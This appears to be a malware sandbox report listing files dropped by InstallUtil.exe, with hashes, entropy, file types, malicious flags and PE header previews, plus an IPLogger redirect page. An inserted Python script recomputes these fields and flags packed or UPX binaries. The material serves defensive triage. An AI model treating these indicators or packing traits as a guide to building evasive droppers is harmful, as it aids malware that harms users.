MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.768477359830509
Encrypted:false
SSDEEP:49152:dnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHA:UWqlkLESgCRE/vhOjb05efd6e/oXHA
MD5:AAFB0357588673B1DB5973DFF4616B8F
SHA1:8CB74C5AF1A3FDFF9A3B1D85927BEB8BDBFD6140
SHA-256:3F759311A90C05A45EC281335DD61FE35CCF4C681B52CC5550B61EB7E8F373D6
SHA-512:DD09DC46BFF496516B57F798B1D2975B0115AE2362B29393B1010BCF8767A2772282C58D85B2B9EC3E972E024E635498B51ADB04B184278C7A178F5485F11884
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....7.-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
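The rows above give size, MD5/SHA digests, 8-bit entropy and libmagic file type for each file InstallUtil.exe dropped. Three things in those rows carry the triage weight: the PE32 drops sit at entropy 7.77 to 7.98 bits per byte (packed or encrypted payload), one of them shows UPX0/UPX1 section names in its preview, and the same IPLogger/yip.su redirect page (MD5 5B423612...) was written out repeatedly alongside the executables. The script below is an added example, not Joe Sandbox code: it recomputes those fields from raw bytes and raises a flag for each of the three observations. The 7.2 entropy threshold, the flag names, and the three sample files (a minimal hand-built PE32 with UPX section names, a plain PE32 with a repetitive body, and a short HTML page modelled on the preview above but stored under an .exe name) are all constructed for this example.

```python
"""Triage helper for rows of a sandbox "dropped files" table (added example,
not Joe Sandbox code). Recomputes size, MD5, SHA-256, 8-bit entropy and PE
section names from raw bytes and derives flags a reviewer otherwise checks
by eye: packed-or-encrypted (entropy above HIGH_ENTROPY), upx-sections
(UPX0/UPX1 section names), borland-linker-stub ("MZP" DOS header, typical
of Borland/Delphi-linked binaries) and html-with-exe-name (HTML content
under an .exe file name). Threshold and samples are constructed."""
import hashlib
import math
import struct
from collections import Counter

HIGH_ENTROPY = 7.2  # assumed threshold; packed or encrypted PEs sit near 8.0


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_section_names(data: bytes) -> list:
    """Section names of a PE image, or [] when MZ/PE headers are missing."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size  # section table follows the optional header
    names = []
    for i in range(nsections):
        off = table + i * 40  # IMAGE_SECTION_HEADER is 40 bytes, name is first 8
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def looks_like_html(data: bytes) -> bool:
    head = data[:256].lstrip().lower()
    return head.startswith(b"<!doctype html") or head.startswith(b"<html")


def triage(name: str, data: bytes) -> dict:
    """Recompute the table fields for one dropped file and attach triage flags."""
    sections = pe_section_names(data)
    entropy = shannon_entropy(data)
    flags = []
    if entropy > HIGH_ENTROPY:
        flags.append("packed-or-encrypted")
    if any(s.startswith("UPX") for s in sections):
        flags.append("upx-sections")
    if data[:3] == b"MZP":
        flags.append("borland-linker-stub")
    if looks_like_html(data) and name.lower().endswith(".exe"):
        flags.append("html-with-exe-name")
    return {"name": name, "size": len(data),
            "md5": hashlib.md5(data).hexdigest().upper(),
            "sha256": hashlib.sha256(data).hexdigest().upper(),
            "entropy": round(entropy, 3), "sections": sections, "flags": flags}


def fake_pe(section_names, body: bytes) -> bytes:
    """Constructed minimal PE32: DOS header, PE signature, IMAGE_FILE_HEADER,
    zeroed 224-byte optional header, section table, then the body bytes."""
    dos = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> PE header at 0x40
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, len(opt), 0x0102)
    table = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + table + body


# Constructed samples standing in for the three kinds of row in such a table.
SAMPLES = {
    # UPX-style section names over a uniform body: entropy close to 8.0
    "setup.exe": fake_pe([b"UPX0", b"UPX1", b".rsrc"], bytes(range(256)) * 64),
    # Plain PE with a repetitive body: low entropy, no flags
    "clean.exe": fake_pe([b".text", b".rdata"], b"A" * 4096),
    # Redirect page stored under an .exe name (stand-in for an expired payload link)
    "payload.exe": b'<!DOCTYPE html>\n<html lang="" class="html">\n<head>\n<title></title>\n'
                   b'<meta name="author" content="Deorg" />\n</head><body></body></html>\n',
}


def triage_samples() -> dict:
    return {name: triage(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for row in triage_samples().values():
        print(f"{row['name']:12} {row['size']:6d} B  entropy={row['entropy']:.3f}  "
              f"sections={row['sections']}  flags={row['flags']}")
```

Run against real drops, the `md5`/`sha256` fields should match the table row for the same file; a mismatch means the sandbox and the analyst are not looking at the same bytes. The entropy flag is deliberately coarse: 7.2 separates packed PEs from ordinary compiled code well, but compressed resources (images, archives) inside a clean binary can cross it too, so treat it as a prompt to unpack, not as a verdict.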
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.768476993492747
Encrypted:false
SSDEEP:49152:cnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHu:PWqlkLESgCRE/vhOjb05efd6e/oXHu
MD5:33B5708DE764163DF8FFAC70113B18E6
SHA1:676C3198C394FCB4A35ECD8647F71A13A461EFE9
SHA-256:2397A5B4A6F418B5E6175D55C48D23F5EA612508516A4E353846FF06237F5F35
SHA-512:D62673367CA42A03A10BE60FA423CD83CF371A30BF4C62850760D86F0DEC6926158A6A280BB7AB4CDE0DE6EAD52C11E818030804D2C812532A20AF4B143020F0
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.768474290842228
Encrypted:false
SSDEEP:49152:4nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHS:7WqlkLESgCRE/vhOjb05efd6e/oXHS
MD5:95F97B76DCB43201CEBCFACE99D5C36C
SHA1:44B55EE7AADD00158A2BCD4180C96566CB043E3B
SHA-256:5E5F06B401B4865D5491BF3CEBD43116F17CBFE71D3884B7674CE5D617338DDC
SHA-512:B1800B9F1F928765ED6984874FBA5876C1D80B1CC7F574740F2997E4ECC5F51F826CF38209C201BBBC05A0FCC2C72203F8166783510A05380FE9BA012F86C282
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
